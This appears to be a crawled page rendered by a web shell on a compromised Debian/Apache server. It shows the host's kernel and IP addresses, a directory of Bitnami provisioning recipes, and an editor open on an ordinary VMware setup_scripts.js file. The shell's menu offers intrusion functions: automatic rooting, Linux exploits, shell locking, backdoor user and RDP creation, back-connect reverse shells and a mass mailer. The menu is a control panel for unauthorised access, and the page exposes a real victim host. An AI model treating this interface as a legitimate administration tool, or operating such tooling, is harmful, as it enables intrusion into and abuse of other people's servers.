Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
bitnami /
nami /
lib /
recipes /
[ HOME SHELL ]
Name
Size
Permission
Action
apps
[ DIR ]
drwxr-xr-x
add_to_system_path.js
881
B
-rw-r--r--
aws_cfn_signal.js
2.22
KB
-rw-r--r--
bitnami_agent.js
4.65
KB
-rw-r--r--
bitnami_enable_login.js
1002
B
-rw-r--r--
clean_machine.js
804
B
-rw-r--r--
configure_host.js
4.08
KB
-rw-r--r--
data_disk.js
4.02
KB
-rw-r--r--
download_database_ssl_certific...
1.42
KB
-rw-r--r--
environment_script.js
2.69
KB
-rw-r--r--
gonit.js
2.91
KB
-rw-r--r--
platform.js
765
B
-rw-r--r--
port_mapping.js
708
B
-rw-r--r--
remove_passwords.js
641
B
-rw-r--r--
resize.js
733
B
-rw-r--r--
setup_scripts.js
1.39
KB
-rw-r--r--
ssh_settings.js
3.11
KB
-rw-r--r--
swapfile.js
1.76
KB
-rw-r--r--
system_packages.js
1.71
KB
-rw-r--r--
system_services.js
2.02
KB
-rw-r--r--
system_user.js
773
B
-rw-r--r--
wait_for_dns.js
933
B
-rw-r--r--
welcome_message.js
3.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : setup_scripts.js
/* * Copyright VMware, Inc. * SPDX-License-Identifier: GPL-2.0-only */ /// <reference path="../../typings-recipe.d.ts" /> /* * Run initialization scripts specified in the setupScripts object of a definition */ "use strict"; recipes.register({ id: "setup-scripts", // Provisioning is performed in multi-tier images during build (boot for image-less platforms) // It is not executed for single VMs meaning this recipe needs to be called externally during build time on: { provisionMachine: { depends: ["system-packages"] } }, conditions: { shouldInvoke: function hasModules() { return provisioner.tierDefinition.modules.length > 0; }, }, recipeHandler: function (input) { // We execute postunpack logic during provisioning, which happens within during the construction of the final image for (const m of provisioner.tierDefinition.modules) { m.runExport("postunpack"); } // Execute setup scripts after postunpack scripts, which are image-specific scripts not tied to a specific component const env = { PATH: `${provisioner.platform.getAdditionalSystemPaths().join(":")}:${process.env.PATH}` }; provisioner.tierDefinition.setupScripts.forEach(setupScript => { logger.info(`Running setup script ${setupScript}`); runProgram("bash", ["-c", setupScript], { env }); }); } });
Close